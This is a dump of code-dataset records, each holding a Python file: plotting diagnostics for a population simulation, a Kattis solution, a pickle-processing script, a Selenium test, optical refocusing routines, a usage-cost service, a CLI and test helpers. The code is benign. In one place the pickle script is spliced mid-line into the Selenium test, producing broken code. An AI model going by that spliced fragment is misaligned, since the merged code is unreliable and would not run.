np.nanmax(Nt[:][:],axis=2)\n\n# --------------------------------------------------------\n# Plotting\n# --------------------------------------------------------\n\n# Plot all initial N - total population - fill between\n# ----------------------------------------------------\nfigure()\nplot(nthfile,N_m[0],'k-')\nplot(nthfile,N_l[0],'r.-', ms = 10)\nplot(nthfile,N_r[0],'r.-', ms = 10)\nfill_between(nthfile, N_min[0], N_max[0],color = 'b')\nfill_between(nthfile, N_l[0], N_r[0],color = 'r')\nxlabel('Time',fontsize=18)\nylabel('Population Total',fontsize=18)\ntitle(plottitle+' R='+str(round(np.nanmean(growthrate_m[0]),4)),fontsize=16)\naxis([-0.1,gen,0,K])\nlegend(loc=0)\n# Updating fontsize on axes\nfontsize=19\nax = gca()\nfor tick in ax.xaxis.get_major_ticks():\n\ttick.label1.set_fontsize(fontsize)\nfor tick in ax.yaxis.get_major_ticks():\n\ttick.label1.set_fontsize(fontsize)\nsavefig(dir+savename+'N.png',dpi=savedpi)\n\n\n# Plot All N as bar - stacked side by side\n# ------------------------------------------\nind = np.asarray(nthfile) # the x locations for the groups\nwidth = 0.15 # the width of the bars\nfig, ax = plt.subplots()\n\nrects1 = ax.bar(ind[0:len(plottime)], N_m[0][plottime], width, color='grey', edgecolor='black', hatch=\"/\")\nyminus = N_m[0][plottime]-N_min[0][plottime]\nyplus = N_m[0][plottime]-N_max[0][plottime]\nax.errorbar(ind[0:len(plottime)]+width/2., N_m[0][plottime], yerr=[yminus, yplus],fmt='bo',capthick=2)\n\nrects2 = ax.bar(ind[0:len(plottime)]+width, totF_m[0][plottime], width, color='grey', edgecolor='black', hatch=\"//\")\nyminus = 
totF_m[0][plottime]-totF_min[0][plottime]\nyplus = totF_m[0][plottime]-totF_max[0][plottime]\nax.errorbar(ind[0:len(plottime)]+3*width/2., totF_m[0][plottime], yerr=[yminus, yplus],fmt='bo',capthick=2)\n\nrects3 = ax.bar(ind[0:len(plottime)]+2*width, totM_m[0][plottime], width, color='grey', edgecolor='black')\nyminus = totM_m[0][plottime]-totM_min[0][plottime]\nyplus = totM_m[0][plottime]-totM_max[0][plottime]\nax.errorbar(ind[0:len(plottime)]+5*width/2., totM_m[0][plottime], yerr=[yminus, yplus],fmt='bo',capthick=2)\n\nrects4 = ax.bar(ind[0:len(plottime)]+3*width, breedF_m[0][plottime], width, color='grey', edgecolor='black', hatch=\"x\")\nyminus = breedF_m[0][plottime]-breedF_min[0][plottime]\nyplus = breedF_m[0][plottime]-breedF_max[0][plottime]\nax.errorbar(ind[0:len(plottime)]+7*width/2., breedF_m[0][plottime], yerr=[yminus, yplus],fmt='bo',capthick=2)\n\nrects5 = ax.bar(ind[0:len(plottime)]+4*width, breedM_m[0][plottime], width, color='grey', edgecolor='black', hatch=\"\\\\\")\nyminus = breedM_m[0][plottime]-breedM_min[0][plottime]\nyplus = breedM_m[0][plottime]-breedM_max[0][plottime]\nax.errorbar(ind[0:len(plottime)]+9*width/2., breedM_m[0][plottime], yerr=[yminus, yplus],fmt='bo',capthick=2)\n\nrects6 = ax.bar(ind[0:len(plottime)]+5*width, births_m[0][plottime], width, color='grey', edgecolor='black', hatch=\"+\")\nyminus = births_m[0][plottime]-births_min[0][plottime]\nyplus = births_m[0][plottime]-births_max[0][plottime]\nax.errorbar(ind[0:len(plottime)]+11*width/2., births_m[0][plottime], yerr=[yminus, yplus],fmt='bo',capthick=2)\n\n# add some\nax.set_ylabel('N values',fontsize=18)\nax.set_xlabel('Time',fontsize=18)\nax.set_title(plottitle,fontsize=21)\nax.set_xticks(ind[0:len(plottime)]+2*width)\nax.set_xticklabels( (np.asarray(plottime,dtype='str')),ha='center' )\nax.legend( (rects1[0], rects2[0],rects3[0],rects4[0],rects5[0],rects6[0]), ('N', 'F','M','Breed F','Breed M','Births') )\nax.axis([-0,len(plottime),0,K])\n\n# Plot age N\n# ----------\n\ncolors = ['k','b','r','y','g','m']\ntick = ['k-','b.-','r--','y,','g,-','m-']\nleg = ['0','1','2','3','4','5']\nfigure()\nplot(nthfile,births_m[0],'c-',label='eggs')\nfill_between(nthfile, births_l[0], births_r[0],color = 'c')\nfor i in range(len(N_age_m[0][0])):\n\tplot(nthfile,N_age_m[0][:,i],tick[i],label=leg[i])\n\tfill_between(nthfile, N_age_l[0][:,i], N_age_r[0][:,i],color=colors[i])\n#plot(nthfile,N_l[0],'r.-', ms = 10)\n#plot(nthfile,N_r[0],'r.-', ms = 10)\nxlabel('Time',fontsize=18)\nylabel('Population Age Total',fontsize=18)\ntitle(plottitle,fontsize=21)\naxis([-0.1,gen,0,K])\nlegend(loc=0)\n# Updating fontsize on axes\nfontsize=19\nax = gca()\nfor tick in ax.xaxis.get_major_ticks():\n\ttick.label1.set_fontsize(fontsize)\nfor tick in ax.yaxis.get_major_ticks():\n\ttick.label1.set_fontsize(fontsize)\nsavefig(dir+savename+'N_age.png',dpi=savedpi)\n\n# Plot He Ho\n# ----------------------------------------------------\nfigure()\nplot(nthfile,He_m[0][:,0],'k-',label='He')\nplot(nthfile,Ho_m[0][:,0],'r.',label='Ho')\n#fill_between(nthfile, He_l[0][:,0], He_r[0][:,0],color = 'b')\n#fill_between(nthfile, Ho_l[0][:,0], Ho_r[0][:,0],color = 'r')\nxlabel('Time',fontsize=18)\nylabel('Heterozygosity',fontsize=18)\ntitle(plottitle+' R='+str(round(np.mean(growthrate_m[0]),4)),fontsize=16)\naxis([-0.1,gen,0,1.0])\nlegend(loc=0)\n# Updating fontsize on axes\nfontsize=19\nax = gca()\nfor tick in ax.xaxis.get_major_ticks():\n\ttick.label1.set_fontsize(fontsize)\nfor tick in 
ax.yaxis.get_major_ticks():\n\ttick.label1.set_fontsize(fontsize)\nsavefig(dir+savename+'H.png',dpi=savedpi)\n\n\n'''\n# Plot all mortality - stacked side by side\n# ------------------------------------------\nind = np.asarray(nthfile) # the x locations for the groups\nwidth = 0.13 # the width of the bars\nfig, ax = plt.subplots()\n\nrects1 = ax.bar(ind[0:len(plottime)], mort_age_m[0][:,0][plottime], width, color='grey', edgecolor='black', hatch=\"/\")\nyminus = mort_age_m[0][:,0][plottime]-mort_age_min[0][:,0][plottime]\nyplus = mort_age_m[0][:,0][plottime]-mort_age_max[0][:,0][plottime]\nax.errorbar(ind[0:len(plottime)]+width/2., mort_age_m[0][:,0][plottime], yerr=[yminus, yplus],fmt='bo',capthick=2)\n\nrects2 = ax.bar(ind[0:len(plottime)]+width, mort_age_m[0][:,1][plottime], width, color='grey', edgecolor='black', hatch=\"//\")\nyminus = mort_age_m[0][:,1][plottime]-mort_age_m[0][:,1][plottime]\nyplus = mort_age_m[0][:,1][plottime]-mort_age_m[0][:,1][plottime]\nax.errorbar(ind[0:len(plottime)]+3*width/2., mort_age_m[0][:,1][plottime], yerr=[yminus, yplus],fmt='bo',capthick=2)\n\n# add some\nax.set_ylabel('Mortality',fontsize=18)\nax.set_xlabel('Time',fontsize=18)\nax.set_title(plottitle,fontsize=21)\nax.set_xticks(ind[0:len(plottime)]+2*width)\nax.set_xticklabels( (np.asarray(plottime,dtype='str')),ha='center' )\nax.legend( (rects1[0], rects2[0]), ('Age0', 'Age1') )\nax.axis([-0,len(plottime),0,K])\nsavefig(dir+savename+'Allmortality.png',dpi=savedpi)\n'''\n\nshow()\n\n","sub_path":"src/post_analysis_scripts/diagnostics_v0.py","file_name":"diagnostics_v0.py","file_ext":"py","file_size_in_byte":16720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"195171135","text":"x, y = map(int, input().split())\nprod = 1\ndiv = y // x\nrem = y % x\nfor i in range(x):\n n = div\n if rem > 0:\n n = n + 1\n rem = rem - 1\n prod = prod * (n / 6)\nprint(prod)\n","sub_path":"kattis/utipc19/paintingpips.py","file_name":"paintingpips.py","file_ext":"py","file_size_in_byte":192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"613979967","text":"import pandas as pd\nimport pickle\nfrom tqdm import tqdm as tqdm\n\nwith open('/nfs/maciej/mcdoi/louvain/estimated_cc+a', 'r', encoding='utf-8') as f:\n estimated = f.readlines()\nestimated = [x.strip() for x in estimated]\n\nfrom multiprocessing import Pool\n\ndef work_sub(string):\n if string.split('_')[-1] == '30':\n with open(string+'/contagion.pickle', 'rb') as f:\n matrix = pickle.load(f)\n with open(string+'/contagion_dict.pickle', 'rb') as f:\n d = pickle.load(f)\n for key, value in d.items():\n for key1, value1 in d.items():\n if valuea.btn.btn-sm > translate > span\")\n time.sleep(7)\n\n ni1 = randInt(3)\n ni2 = randInt(3)\n\n driver.find_element_by_css_selector(\n \"table.table > tbody > tr:first-child > td:nth-child(8) .input-group:first-child > input\").clear()\n driver.find_element_by_css_selector(\n \"table.table > tbody > tr:first-child > td:nth-child(8) .input-group:first-child > input\") \\\n .send_keys(ni1)\n\n driver.find_element_by_css_selector(\n \"table.table > tbody > tr:first-child > td:nth-child(8) .input-group:nth-child(2) > input\").clear()\n driver.find_element_by_css_selector(\n \"table.table > tbody > tr:first-child > td:nth-child(8) .input-group:nth-child(2) > input\").send_keys(\n ni2)\n\n driver.find_element_by_css_selector(\n \"table.table > tbody > tr:nth-child(2) > td:nth-child(9) .input-group:first-child > 
input\").clear()\n driver.find_element_by_css_selector(\n \"table.table > tbody > tr:nth-child(2) > td:nth-child(9) .input-group:first-child > input\") \\\n .send_keys(ni1)\n\n driver.find_element_by_css_selector(\n \"table.table > tbody > tr:nth-child(2) > td:nth-child(9) .input-group:nth-child(2) > input\").clear()\n driver.find_element_by_css_selector(\n \"table.table > tbody > tr:nth-child(2) > td:nth-child(9) .input-group:nth-child(2) > input\") \\\n .send_keys(ni2)\n\n self.click_css(\"div>a.btn.btn-sm.btn-success > translate > span\")\n time.sleep(2)\n\n self.click_css(\".prices_tab .fa-file-o\")\n\n time.sleep(2)\n self.move_to_element(By.CSS_SELECTOR, '.fa-refresh')\n\n self.click_css('.main-nav-tabs .fa-arrow-down')\n time.sleep(2)\n\n if self.assertTrue(driver.page_source.__contains__(ni2), msg='Python cant found offer volume: ' + ni2):\n False\n else:\n print(\"pass - found offer volume: \" + ni2)\n if self.assertTrue(driver.page_source.__contains__(ni1),\n msg='Python cant found offer volume: ' + ni1):\n False\n else:\n print(\"pass - found offer volume: \" + ni1)\n\n\n self.log_out()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"gt_tests/Deals/creating_offers_in_market.py","file_name":"creating_offers_in_market.py","file_ext":"py","file_size_in_byte":3181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"399972276","text":"import multiprocessing as mp\nimport numpy as np\n\nfrom . import pad\n\n__all__ = [\"fft_propagate\", \"refocus\", \"refocus_stack\"]\n\n\n_cpu_count = mp.cpu_count()\n\n\ndef refocus(field, d, nm, res, method=\"helmholtz\", num_cpus=1, padding=True):\n \"\"\"Refocus a 1D or 2D field\n\n\n Parameters\n ----------\n field : 1d or 2d array\n 1D or 2D background corrected electric field (Ex/BEx)\n d : float\n Distance to be propagated in pixels (negative for backwards)\n nm : float\n Refractive index of medium\n res : float\n Wavelenth in pixels\n method : str\n Defines the method of propagation;\n one of\n\n - \"helmholtz\" : the optical transfer function `exp(idkₘ(M-1))`\n - \"fresnel\" : paraxial approximation `exp(idk²/kₘ)`\n\n num_cpus : int\n Not implemented. Only one CPU is used.\n padding : bool\n perform padding with linear ramp from edge to average\n to reduce ringing artifacts.\n\n .. 
versionadded:: 0.1.4\n\n Returns\n -------\n Electric field at `d`.\n \"\"\"\n # FFT of field\n fshape = len(field.shape)\n assert fshape in [1, 2], \"Dimension of `field` must be 1 or 2.\"\n\n func = fft_propagate\n names = func.__code__.co_varnames[:func.__code__.co_argcount]\n\n loc = locals()\n vardict = dict()\n\n for name in names:\n if name in loc:\n vardict[name] = loc[name]\n\n if padding:\n field = pad.pad_add(field)\n\n vardict[\"fftfield\"] = np.fft.fftn(field)\n\n refoc = func(**vardict)\n\n if padding:\n refoc = pad.pad_rem(refoc)\n\n return refoc\n\n\ndef refocus_stack(fieldstack, d, nm, res, method=\"helmholtz\",\n num_cpus=_cpu_count, copy=True, padding=True):\n \"\"\"Refocus a stack of 1D or 2D fields\n\n\n Parameters\n ----------\n fieldstack : 2d or 3d array\n Stack of 1D or 2D background corrected electric fields (Ex/BEx).\n The first axis iterates through the individual fields.\n d : float\n Distance to be propagated in pixels (negative for backwards)\n nm : float\n Refractive index of medium\n res : float\n Wavelength in pixels\n method : str\n Defines the method of propagation;\n one of\n\n - \"helmholtz\" : the optical transfer function `exp(idkₘ(M-1))`\n - \"fresnel\" : paraxial approximation `exp(idk²/kₘ)`\n\n num_cpus : int\n Defines the number of CPUs to be used for refocusing.\n copy : bool\n If False, overwrites input stack.\n padding : bool\n Perform padding with linear ramp from edge to average\n to reduce ringing artifacts.\n\n .. versionadded:: 0.1.4\n\n Returns\n -------\n Electric field stack at `d`.\n \"\"\"\n\n func = refocus\n names = func.__code__.co_varnames[:func.__code__.co_argcount]\n\n loc = locals()\n vardict = dict()\n for name in names:\n if name in loc.keys():\n vardict[name] = loc[name]\n # default keyword arguments\n func_def = func.__defaults__[::-1]\n\n # child processes should only use one cpu\n vardict[\"num_cpus\"] = 1\n vardict[\"padding\"] = padding\n\n M = fieldstack.shape[0]\n stackargs = list()\n\n # Create individual arglists for all fields\n for m in range(M):\n kwarg = vardict.copy()\n kwarg[\"field\"] = fieldstack[m]\n # now we turn the kwarg into an arglist\n args = list()\n for i, a in enumerate(names[::-1]):\n # first set default\n if i < len(func_def):\n val = func_def[i]\n if a in kwarg:\n val = kwarg[a]\n args.append(val)\n stackargs.append(args[::-1])\n\n p = mp.Pool(num_cpus)\n result = p.map_async(_refocus_wrapper, stackargs).get()\n p.close()\n p.terminate()\n p.join()\n\n if copy:\n data = np.zeros(fieldstack.shape, dtype=result[0].dtype)\n else:\n data = fieldstack\n\n for m in range(M):\n data[m] = result[m]\n\n return data\n\n\ndef fft_propagate(fftfield, d, nm, res, method=\"helmholtz\",\n ret_fft=False):\n \"\"\"Propagates a 1D or 2D Fourier transformed field\n\n\n Parameters\n ----------\n fftfield : 1-dimensional or 2-dimensional ndarray\n Fourier transform of 1D Electric field component\n d : float\n Distance to be propagated in pixels (negative for backwards)\n nm : float\n Refractive index of medium\n res : float\n Wavelength in pixels\n method : str\n Defines the method of propagation;\n one of\n\n - \"helmholtz\" : the optical transfer function `exp(idkₘ(M-1))`\n - \"fresnel\" : paraxial approximation `exp(idk²/kₘ)`\n\n ret_fft : bool\n Do not perform an inverse Fourier transform and return the field\n in Fourier space.\n\n\n Returns\n -------\n Electric field at `d`. 
If `ret_fft` is True, then the\n Fourier transform of the electric field will be returned (faster).\n \"\"\"\n fshape = len(fftfield.shape)\n assert fshape in [1, 2], \"Dimension of `fftfield` must be 1 or 2.\"\n\n if fshape == 1:\n func = fft_propagate_2d\n else:\n func = fft_propagate_3d\n\n names = func.__code__.co_varnames[:func.__code__.co_argcount]\n\n loc = locals()\n vardict = dict()\n for name in names:\n vardict[name] = loc[name]\n\n return func(**vardict)\n\n\ndef fft_propagate_2d(fftfield, d, nm, res, method=\"helmholtz\",\n ret_fft=False):\n \"\"\"Propagate a 1D Fourier transformed field in 2D\n\n\n Parameters\n ----------\n fftfield : 1d array\n Fourier transform of 1D Electric field component\n d : float\n Distance to be propagated in pixels (negative for backwards)\n nm : float\n Refractive index of medium\n res : float\n Wavelength in pixels\n method : str\n Defines the method of propagation;\n one of\n\n - \"helmholtz\" : the optical transfer function `exp(idkₘ(M-1))`\n - \"fresnel\" : paraxial approximation `exp(idk²/kₘ)`\n\n ret_fft : bool\n Do not perform an inverse Fourier transform and return the field\n in Fourier space.\n\n\n Returns\n -------\n Electric field at `d`. If `ret_fft` is True, then the\n Fourier transform of the electric field will be returned (faster).\n \"\"\"\n assert len(fftfield.shape) == 1, \"Dimension of `fftfield` must be 1.\"\n km = (2 * np.pi * nm) / res\n kx = np.fft.fftfreq(len(fftfield)) * 2 * np.pi\n\n # free space propagator is\n if method == \"helmholtz\":\n # exp(i*sqrt(km²-kx²)*d)\n # Also subtract incoming plane wave. We are only considering\n # the scattered field here.\n root_km = km**2 - kx**2\n rt0 = (root_km > 0)\n # multiply by rt0 (filter in Fourier space)\n fstemp = np.exp(1j * (np.sqrt(root_km * rt0) - km) * d) * rt0\n elif method == \"fresnel\":\n # exp(i*d*(km-kx²/(2*km))\n # fstemp = np.exp(-1j * d * (kx**2/(2*km)))\n fstemp = np.exp(-1j * d * (kx**2/(2*km)))\n else:\n raise ValueError(\"Unknown method: {}\".format(method))\n\n if ret_fft:\n return fftfield * fstemp\n else:\n return np.fft.ifft(fftfield * fstemp)\n\n\ndef fft_propagate_3d(fftfield, d, nm, res, method=\"helmholtz\",\n ret_fft=False):\n \"\"\"Propagate a 2D Fourier transformed field in 3D\n\n\n Parameters\n ----------\n fftfield : 2d array\n Fourier transform of 2D Electric field component\n d : float\n Distance to be propagated in pixels (negative for backwards)\n nm : float\n Refractive index of medium\n res : float\n Wavelength in pixels\n method : str\n Defines the method of propagation;\n one of\n\n - \"helmholtz\" : the optical transfer function `exp(idkₘ(M-1))`\n - \"fresnel\" : paraxial approximation `exp(idk²/kₘ)`\n\n ret_fft : bool\n Do not perform an inverse Fourier transform and return the field\n in Fourier space.\n\n\n Returns\n -------\n Electric field at `d`. 
If `ret_fft` is True, then the\n Fourier transform of the electric field will be returned (faster).\n \"\"\"\n assert len(fftfield.shape) == 2, \"Dimension of `fftfield` must be 2.\"\n # if fftfield.shape[0] != fftfield.shape[1]:\n # raise NotImplementedError(\"Field must be square shaped.\")\n # free space propagator is\n # exp(i*sqrt(km**2-kx**2-ky**2)*d)\n km = (2 * np.pi * nm) / res\n kx = (np.fft.fftfreq(fftfield.shape[0]) * 2 * np.pi).reshape(-1, 1)\n ky = (np.fft.fftfreq(fftfield.shape[1]) * 2 * np.pi).reshape(1, -1)\n if method == \"helmholtz\":\n # exp(i*sqrt(km²-kx²-ky²)*d)\n root_km = km**2 - kx**2 - ky**2\n rt0 = (root_km > 0)\n # multiply by rt0 (filter in Fourier space)\n fstemp = np.exp(1j * (np.sqrt(root_km * rt0) - km) * d) * rt0\n elif method == \"fresnel\":\n # exp(i*d*(km-(kx²+ky²)/(2*km))\n # fstemp = np.exp(-1j * d * (kx**2+ky**2)/(2*km))\n fstemp = np.exp(-1j * d * (kx**2 + ky**2)/(2*km))\n else:\n raise ValueError(\"Unknown method: {}\".format(method))\n # fstemp[np.where(np.isnan(fstemp))] = 0\n # Also subtract incoming plane wave. We are only considering\n # the scattered field here.\n if ret_fft:\n return fftfield * fstemp\n else:\n return np.fft.ifft2(fftfield * fstemp)\n\n\ndef _refocus_wrapper(args):\n \"\"\"Just calls refocus with *args. Needed for multiprocessing pool.\n \"\"\"\n return refocus(*args)\n","sub_path":"nrefocus/_propagate.py","file_name":"_propagate.py","file_ext":"py","file_size_in_byte":9469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"}
+{"seq_id":"40876664","text":"from dataclasses import dataclass\nfrom repository.openai_model_repository import OpenAIModel\nfrom services.openai_model_service import OpenAIModelService\nfrom repository.chatgpt_usage_repository import ChatGptUsageRepository\nfrom utils.timestamp import timestamp\n\n@dataclass\nclass UserUsage:\n user_name: str\n model_id: int\n prompt_tokens: int\n completion_tokens: int\n cost: float\n\n@dataclass\nclass ModelReport:\n model: OpenAIModel\n usages: list[UserUsage]\n prompt_tokens: int\n completion_tokens: int\n cost: float\n\nclass ChatGptUsageService:\n\n def __init__(self, repo: ChatGptUsageRepository, openai_model_service: OpenAIModelService) -> None:\n self._repo = repo\n self._openai_model_service = openai_model_service\n\n def get_usages(self) -> list[ModelReport]:\n start = timestamp() - (24 * 60 * 60 * 1000) # last 24 hours\n usages = self._repo.get_usages(start)\n\n models = self._openai_model_service.get_all()\n model_dict = {m.id:m for m in models}\n\n records: list[UserUsage] = []\n\n for (user_name, model_id, prompt, completion) in usages:\n model = model_dict[model_id]\n\n prompt_cost = prompt / model.base_tokens * model.prompt_cost\n completion_cost = completion / model.base_tokens * model.completion_cost\n\n records.append(UserUsage(\n user_name=user_name,\n model_id=model_id,\n prompt_tokens=prompt,\n completion_tokens=completion,\n cost=prompt_cost + completion_cost\n ))\n\n records.sort(key=lambda u: u.cost, reverse=True)\n\n model_ids = set(x.model_id for x in records)\n groups = [[r for r in records if r.model_id == model_id] for model_id in model_ids]\n\n reports: list[ModelReport] = []\n\n for group in groups:\n model = model_dict[group[0].model_id]\n prompt_tokens = sum((u.prompt_tokens for u in group))\n completion_tokens = sum((u.completion_tokens for u in group))\n cost = sum((u.cost for u in group))\n\n report = ModelReport(\n model=model,\n usages=group,\n prompt_tokens=prompt_tokens,\n 
completion_tokens=completion_tokens,\n cost=cost,\n )\n\n reports.append(report)\n\n reports.sort(key=lambda r: r.cost, reverse=True)\n\n return reports\n\n def get_billed_usages(self):\n return self._repo.get_billed_usages()\n\n def get_billed_usage_by_id(self, billing_id: int) -> int:\n return self._repo.get_billed_usage_by_id(billing_id)","sub_path":"hub/services/chatgpt_usage_service.py","file_name":"chatgpt_usage_service.py","file_ext":"py","file_size_in_byte":2660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"302809292","text":"import pytest\n\nfrom polydatum import DataManager, Service\nfrom polydatum.context import DataAccessContext\n\n\ndef test_meta():\n \"\"\"\n Verify that meta can be given and retrieved from a context\n \"\"\"\n\n class TestService(Service):\n def get_user(self):\n return self._ctx.meta.user\n\n user = object()\n\n dm = DataManager()\n dm.register_services(test=TestService())\n\n with dm.context(meta={\"user\": user}) as ctx:\n assert ctx.dal.test.get_user() is user\n\n # Verify meta can not change\n with dm.context(meta={\"user\": user}) as ctx:\n with pytest.raises(AttributeError):\n ctx.meta.user = \"foo\"\n assert ctx.dal.test.get_user() is user\n\n\ndef test_unique_context():\n \"\"\"\n Ensure that we get a new context on each DAL enter.\n \"\"\"\n data_manager = DataManager()\n with data_manager.dal():\n context1 = data_manager.get_active_context()\n\n with data_manager.dal():\n context2 = data_manager.get_active_context()\n\n assert context1 != context2\n\n\ndef test_service_context():\n \"\"\"\n Verify that if you access a Service's context when no\n context is active, you get a RuntimeError.\n \"\"\"\n\n class TestService(Service):\n def get_context(self):\n return self._ctx\n\n data_manager = DataManager()\n data_manager.register_services(test=TestService())\n\n with data_manager.dal() as dal:\n ctx = dal.test.get_context()\n get_context = dal.test.get_context\n\n assert isinstance(ctx, DataAccessContext)\n\n with pytest.raises(RuntimeError):\n get_context()\n\n\ndef test_require_active_context():\n \"\"\"\n Verify require_active_context raises an exception when there is no context\n or returns the context when there is one.\n \"\"\"\n data_manager = DataManager()\n with pytest.raises(RuntimeError):\n data_manager.require_active_context()\n\n with data_manager.context() as ctx:\n assert data_manager.require_active_context() is ctx\n","sub_path":"tests/test_context.py","file_name":"test_context.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"212680576","text":"from __future__ import division, absolute_import, print_function\n\nimport argparse\nimport os\nimport glob\nfrom gp_align.analyse import analyse_run\n\nparser = argparse.ArgumentParser(description=\"Analyse growth profiler images\")\nparser.set_defaults(func=lambda args: parser.print_help())\n\nsubparsers = parser.add_subparsers()\n\n\ndef analyse_images(args):\n filenames = []\n for f in args.infiles:\n if \"*\" in f:\n filenames.extend(glob.glob(f))\n else:\n filenames.append(f)\n\n for filename in filenames:\n if not os.path.isfile(filename):\n raise ValueError(filename, \"does not exist\")\n\n outname = args.out\n\n if args.scanner == 1:\n plate_names = None\n elif args.scanner == 2:\n plate_names = [\"tray7\", \"tray8\", \"tray9\", \"tray10\", \"tray11\", \"tray12\"]\n\n plate_type = args.plate_type\n orientation = 
args.orientation\n\n data = analyse_run(filenames, plate_type, orientation=orientation, plate_names=plate_names)\n\n for name, df in data.items():\n df.to_csv(outname + \"_\" + name + \".G.tsv\", sep=\"\\t\")\n\n\nanalyse_parser = subparsers.add_parser(\n \"analyse\", help=\"Analyse a list of growth profiler images and output a tsv file with growth curves\"\n)\nanalyse_parser.add_argument(\"infiles\", type=str, nargs=\"+\")\nanalyse_parser.add_argument(\"--out\", type=str, default=\"result\")\nanalyse_parser.add_argument(\"--orientation\", type=str, default=\"top_right\", choices=[\"top_right\", \"bottom_left\"])\nanalyse_parser.add_argument(\"--plate_type\", type=int, default=1)\nanalyse_parser.add_argument(\"--scanner\", type=int, default=1, choices=[1, 2])\nanalyse_parser.set_defaults(func=analyse_images)\n\n\ndef convert_g_values(args):\n import numpy as np\n import pandas as pd\n\n def convert_G_to_OD(val, A, B, C):\n return np.exp((val - C) / A) - B\n\n parameters = args.parameters\n inputs = args.files\n\n parameters = list(map(float, parameters))\n print(parameters)\n\n filenames = []\n for f in inputs:\n if \"*\" in f:\n filenames.extend(glob.glob(f))\n else:\n filenames.append(f)\n\n for filename in filenames:\n if not os.path.isfile(filename):\n raise ValueError(filename, \"does not exist\")\n if not filename.endswith(\".G.tsv\"):\n raise ValueError(filename, \"does not end with .G.tsv\")\n\n for filename in filenames:\n df = pd.read_csv(filename, sep=\"\\t\", index_col=0)\n\n converted_df = convert_G_to_OD(df, *parameters)\n converted_df.index = converted_df.index / 60\n\n outname = filename[:-5] + \"OD.v2.tsv\"\n converted_df.to_csv(outname, sep=\"\\t\")\n\nconvert_parser = subparsers.add_parser(\n \"convert\", help=\"Convert the output G-value files to OD-values, using a set of calibration parameters.\"\n)\nconvert_parser.add_argument(\"parameters\", type=str, nargs=3)\nconvert_parser.add_argument(\"files\", type=str, nargs=\"+\")\nconvert_parser.set_defaults(func=convert_g_values)","sub_path":"gp_align/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":2954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"614564085","text":"# coding=utf-8\n# Copyright (C) 2020 NumS Development Team.\n#\n# Permission is hereby granted, free of charge, to any person obtaining a\n# copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER\n# DEALINGS IN THE SOFTWARE.\n\n\nimport numpy as np\n\nfrom nums.core.systems import numpy_compute\nfrom nums.core.systems.systems import System, RaySystem\nfrom nums.core.systems.filesystem import FileSystem\nfrom nums.core.systems.schedulers import RayScheduler, BlockCyclicScheduler\nfrom nums.core.array.application import ArrayApplication, BlockArray\n\n\ndef check_block_integrity(arr: BlockArray):\n for grid_entry in arr.grid.get_entry_iterator():\n assert arr.blocks[grid_entry].grid_entry == grid_entry\n assert arr.blocks[grid_entry].rect == arr.grid.get_slice_tuples(grid_entry)\n assert arr.blocks[grid_entry].shape == arr.grid.get_block_shape(grid_entry)\n\n\nclass MockMultiNodeScheduler(BlockCyclicScheduler):\n # pylint: disable=abstract-method, bad-super-call\n\n def init(self):\n # Intentionally calling init of grandparent class.\n super(BlockCyclicScheduler, self).init()\n # Replicate available nodes to satisfy cluster requirements.\n assert len(self.available_nodes) == 1\n\n self.available_nodes = self.available_nodes * np.prod(self.cluster_shape)\n for i, cluster_entry in enumerate(self.get_cluster_entry_iterator()):\n self.cluster_grid[cluster_entry] = self.available_nodes[i]\n\n\ndef mock_cluster(cluster_shape):\n scheduler: RayScheduler = MockMultiNodeScheduler(compute_module=numpy_compute,\n cluster_shape=cluster_shape,\n use_head=True)\n system: System = RaySystem(compute_module=numpy_compute,\n scheduler=scheduler)\n system.init()\n return ArrayApplication(system=system, filesystem=FileSystem(system))\n","sub_path":"tests/array/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"525736030","text":"import datetime\nfrom datetime import timedelta\nfrom dateutil.relativedelta import relativedelta\nfrom django.conf import settings\nfrom django.urls import reverse\nfrom djrichtextfield.models import RichTextField\n\nfrom users.models import User\nfrom django.core.validators import MinValueValidator, MaxValueValidator\nfrom django.db import models\n\n# Create your models here.\nfrom django_countries.fields import CountryField\nfrom djmoney.models.fields import MoneyField\n\n\nclass Car(models.Model):\n TRANSMISSIONS = [\n ('Manual', 'Manual'),\n ('Automatic', 'Automatic')\n ]\n FUELS = [\n ('Gasoline', 'Gasoline'),\n ('Diesel', 'Diesel'),\n ('Liquefied Petroleum', 'Liquefied Petroleum'),\n ('Compressed Natural Gas', 'Compressed Natural Gas'),\n ('Ethanol', 'Ethanol'),\n ('Bio-diesel', 'Bio-diesel')\n ]\n PRICE_VARIATIONS = [\n ('Month', 'Month')\n ]\n owner = models.ForeignKey(User, on_delete=models.CASCADE, blank=False, null=False)\n name = models.CharField(max_length=255, blank=False, null=False)\n brand = models.ForeignKey('Brand', on_delete=models.SET_NULL, blank=False, null=True)\n model_no = 